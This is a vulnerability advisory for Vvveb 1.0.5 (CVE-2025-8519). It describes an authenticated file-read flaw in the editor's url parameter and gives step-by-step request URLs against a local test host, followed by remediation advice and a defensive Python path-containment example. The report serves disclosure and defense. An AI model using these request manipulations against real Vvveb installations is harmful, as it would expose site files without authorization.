Vvveb - v1.0.5 - Internal File Read

By 0xhamy 03:24 AM - September 29th 2025
Type: software
Product Environment: web
Product Name: Vvveb
Product Vendor: Vvveb
Product Version: 1.0.5
Product Link: https://github.com/givanz/Vvveb
Vulnerability Name: Internal File Read
Severity: Medium
CVSS String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS Score: 4.3
CVE ID: CVE-2025-8519
Vendor Acknowledgement: Yes
Affected Digital Assets: 268
Affected Users: 26800
Date of Reporting: Jan 03, 2025
PoC Exploit: -
Credit: 0xhamy

Description

The editor endpoint /vadmin123/index.php?module=editor/editor&url=/&template=index.html exposes a file-read vector that allows an authenticated user with Edit website privileges to read legacy Vvveb files from the webroot. In this test the issue was limited to non-sensitive legacy files (e.g., LICENSE, README.md, package.json, static error pages), so the current severity is Low. However, the vulnerability reveals server file paths and can expose configuration or other information if sensitive files exist under the accessible directory.


Reproduce

Preconditions: an account with access to the site’s Edit website / editor functionality.

  1. Log in as an editor (or any role with “Edit website” permissions).
  2. Open the editor URL:
     http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=/&template=index.html
  3. Modify the url parameter to point at a filename (or path) under the legacy Vvveb directory. Example:
     http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=index.html
  4. The modified request allows browsing/reading files from:
     /var/www/html/public/admin/default

Example files found during testing:

/var/www/html/public/admin/default # ls -la

total 448
drwx-wx-wx   22 www-data www-data      4096 Jan  3 14:56 .
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:57 ..
-rwx-wx-wx    1 www-data www-data     10173 Jan  3 14:56 LICENSE
-rwx-wx-wx    1 www-data www-data      5378 Jan  3 14:56 README.md
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 admin
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:56 content
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 css
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 editor
drwx-wx-wx    4 www-data www-data      4096 Jan  3 14:56 email
-rwx-wx-wx    1 www-data www-data     73835 Jan  3 14:56 error403.html
-rwx-wx-wx    1 www-data www-data     73408 Jan  3 14:56 error404.html
-rwx-wx-wx    1 www-data www-data     74142 Jan  3 14:56 error500.html
-rwx-wx-wx    1 www-data www-data      3150 Jan  3 14:56 favicon.ico
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 field
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 fields
  5. Confirm the file read by requesting a specific file directly via the url parameter, e.g.:
     http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=package.json

or:

     http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=tools/systeminfo.html
  6. Observation: the server returns the contents of the requested file. In this assessment only non-sensitive legacy files were exposed; sensitive system files could not be read in this test.

Recommendation

  • Restrict file access by design: Validate and canonicalize the url parameter server-side. Only allow reading files from a controlled content store (e.g., database or a specific whitelist of templates), never arbitrary filesystem paths.
  • Input validation / path normalization: Reject or sanitize path traversal and relative path components (.., ./) and ensure the resolved path is contained within an allowed base directory. Prefer mapping logical template names to fixed file locations rather than accepting arbitrary filenames.
  • Least privilege for editor functionality: Ensure editor roles cannot access underlying filesystem artifacts. Limit the set of users who can view or edit raw template files.
  • Deny direct access to legacy directories: Move legacy/unused Vvveb assets out of the webroot or restrict access via server configuration (deny from all) so they cannot be served even when referenced.
  • Use explicit whitelists: Implement a whitelist of allowed template names/URLs; any request that does not match a known template should be rejected with a generic error.
  • Logging & monitoring: Log attempts to access unexpected files and alert on read attempts to configuration files or other sensitive locations.
  • Periodic cleanup: Remove or archive outdated/unused code and asset directories (like old Vvveb files) from production systems to reduce attack surface.
  • Pen-test / code review: Add unit/integration tests for the editor endpoint to assert that only permitted files are returned and perform a focused review of file-serving logic.
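The following is an added example, not code from Vvveb (which is written in PHP), showing in Python how the first two recommendations combine: logical template names are mapped to fixed files through an allow-list, and every resolved path is canonicalized and checked for containment in the template root before anything is read. The TEMPLATE_MAP entries, the temporary root and the symlink are constructed for the demonstration.

```python
import os
import re
import tempfile

# Constructed allow-list: logical template name -> file relative to the template root.
# Assumption: a real deployment would load this from a manifest or the database.
TEMPLATE_MAP = {"index": "index.html", "page": "page.html"}
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

class TemplateAccessError(ValueError):
    """Any request that is not an exact, known, contained template."""

def contained_path(base_dir: str, relative: str) -> str:
    """Join relative onto base_dir and return its canonical path, refusing anything whose
    real location (after '..' and symlink resolution) lies outside base_dir."""
    if os.path.isabs(relative):
        raise TemplateAccessError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    # commonpath compares whole components, so /tpl2 is not mistaken for a child of /tpl.
    if os.path.commonpath([base, candidate]) != base:
        raise TemplateAccessError("path escapes the allowed base directory")
    return candidate

def resolve_template(template_root: str, name: str) -> str:
    """Map a logical template name to its file; the raw name never reaches the filesystem."""
    if not _NAME_RE.fullmatch(name or ""):
        raise TemplateAccessError("malformed template name")
    relative = TEMPLATE_MAP.get(name)
    if relative is None:
        raise TemplateAccessError("unknown template")
    return contained_path(template_root, relative)

def demo() -> dict:
    """Run constructed requests against a throwaway root; True means the request would be served."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        # Constructed symlink inside the root that points at its parent directory.
        os.symlink(os.path.dirname(root), os.path.join(root, "up"))
        cases = [("known name", resolve_template, "index"), ("raw filename", resolve_template, "index.html"),
                 ("dot-dot", contained_path, "../outside.txt"), ("absolute", contained_path, "/etc/hostname"),
                 ("symlink escape", contained_path, "up/outside.txt"), ("inside root", contained_path, "css/style.css")]
        for label, check, arg in cases:
            try:
                check(root, arg)
                results[label] = True
            except TemplateAccessError:
                results[label] = False
    return results
```

Only the mapped logical name and a relative path that stays inside the root are accepted; a raw filename, a dot-dot component, an absolute path and a symlink that leaves the root are all rejected before any file is opened.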

Applying these mitigations will prevent arbitrary file-read via the editor url parameter and reduce the chance of exposing sensitive configuration or internal files.